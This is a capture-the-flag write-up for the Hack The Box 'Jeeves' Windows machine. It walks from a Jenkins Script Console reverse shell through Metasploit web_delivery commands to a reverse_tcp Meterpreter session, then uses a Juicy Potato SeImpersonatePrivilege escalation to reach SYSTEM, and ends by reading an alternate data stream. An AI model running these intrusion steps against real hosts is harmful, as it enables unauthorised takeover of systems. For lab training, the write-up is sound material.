HTB | Jeeves
This is a Windows box. You can find it here.
Skills Learned
Obtaining shell through Jenkins
Enumerating alternate data streams
NMAP
IP: 10.10.10.63


port 80

Using the search function throws a stack trace.

From it we learn the site is running:
ASP.NET Version 2.0.5
MS SQL Server 2005
Now let's look at port 50000.
port 50000

Let's run gobuster against it.

We found /askjeeves.
Visiting it shows a Jenkins instance.

Foothold/ shell
Under Manage Jenkins > Script Console we can execute arbitrary Groovy on the Jenkins host, which is all we need for a shell.

Start an nc listener and run a Groovy reverse shell in the console.

We got the shell.
We found user.txt.

Priv Esc
Our token has SeImpersonatePrivilege.

Since SeImpersonatePrivilege is enabled, a potato-style attack (coercing a SYSTEM authentication and impersonating the resulting token) should work. We will use Metasploit for that.
First we use exploit/multi/script/web_delivery to upgrade our existing shell to a Meterpreter session:
use exploit/multi/script/web_delivery
set srvhost tun0
set lhost tun0
set target PSH
set payload windows/meterpreter/reverse_tcp
run
Copy the PowerShell one-liner the module prints into our existing shell; once it runs, we have a Meterpreter session.

Now we run post/multi/recon/local_exploit_suggester against the session to list candidate local exploits.
It finds several.

Let's use exploit/windows/local/ms16_075_reflection_juicy (Juicy Potato, which abuses SeImpersonatePrivilege): set SESSION to our Meterpreter session and run it.

Boom, we are NT AUTHORITY\SYSTEM. But there is no root.txt on the desktop; instead there is a file called hm.txt.

Let's look deeper. dir /R lists each file together with its alternate data streams:
dir /R

hm.txt carries a second stream, hm.txt:root.txt:$DATA. type will not open a stream name directly, but redirecting it as input works:
more < hm.txt:root.txt:$DATA

and we have root.txt.
Always look for alternate data streams.